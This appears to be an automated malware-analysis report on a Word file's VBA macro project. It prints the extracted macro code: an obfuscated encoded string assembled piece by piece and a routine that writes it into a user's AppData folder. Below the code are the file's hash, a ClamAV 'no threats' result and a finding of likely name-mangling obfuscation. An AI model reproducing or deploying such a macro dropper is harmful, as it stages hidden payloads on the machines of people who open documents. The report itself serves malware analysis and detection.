str = str & "hhZGJGcmFOYzV4VVhZaF1uVkpGV2pH"
str = str & "R0dieHYyM1ZsTV5ObEFUWnYxQ101VW"
str = str & "VxazhiZFJrWFs1YWpha1tWSkJrV2s1"
str = str & "VGpzRkFkRml6elFwYTJXbFVSSldtU1"
str = str & "J4VjBYRXhidGVHWGZaTlZzVlJUWnJF"
str = str & "Tl5SV2RHMWFkdGdXelJoVjhpRmJaTn"
str = str & "dGT1VaWlY2VEdiWlNEeGdFYUprVVhZ"
str = str & "NU1rakt0UmpxbFNkNVRXWF5CYmhYWG"
str = str & "dTRkEyU1J0Vjo1MUlSUmJsSFdSV0pT"
str = str & "a1hWSmFrVmhOYUp0bEthWmlrWFd4TV"
str = str & "JXVERNWnIxb2pOVWhYV3ViTldueFJN"
str = str & "VDBHbXZWcDExbGZwYUZHbUplRkZqdl"
str = str & "NSVjpWalJWMXYwV1xSVmQzR3RiTlFF"
str = str & "V2ZSVkZhbFlZUldHV1tkVW14MUBWMT"
str = str & "ZtWFNCYTxTR2dhcENsT2ZaWlpha1dh"
str = str & "ZFVYSFJKVjR3bXJWWT1rV0hkZUpYbF"
str = str & "NSaElrcVVaYlZTSENiUnQyMGZkV1hY"
str = str & "bXhlaGRsdVFOVjZzekdZb3ZFV1xwUW"
str = str & "V6MkRVMTUyeVZaTVRXbXdXWlJGV1xS"
str = str & "WWhYR2JiVlNuV1FsUzAxVzlWVlZUTl"
str = str & "ZSZEZyMVtWWmpWaFNoVjhhRmdjSkdH"
str = str & "T1toV2w0bGxSWmRGdGZaVlZ3Vl9UaG"
str = str & "JtaVtsVGl5RlplMXZtM1ZGV0ppbFdX"
str = str & "VkRHYWpGVm0xMkhhbFVIdGZKV0JTa1"
str = str & "NXbDZsWFc5Wkl3Vl9WZGZsT1dSV0hV"
str = str & "WGdWNUVFd20wVm"
VVV = str
End Function
Sub savefile(XX)
Dim filePath As String
filePath = "C:\Users\WinUline\AppData\code.txt"
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile(filePath)
oFile.WriteLine XX
oFile.Close
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 46080 bytes |
SHA-256: c46a134486ff11c7f833fe44711112aeb3b852be4b5e5da8cdfbc008805dc458 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
979 of 1267 identifiers look randomly generated (e.g. 'ZUVFtSaGRreVFJVjJrVE9WQmZuV1xk') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.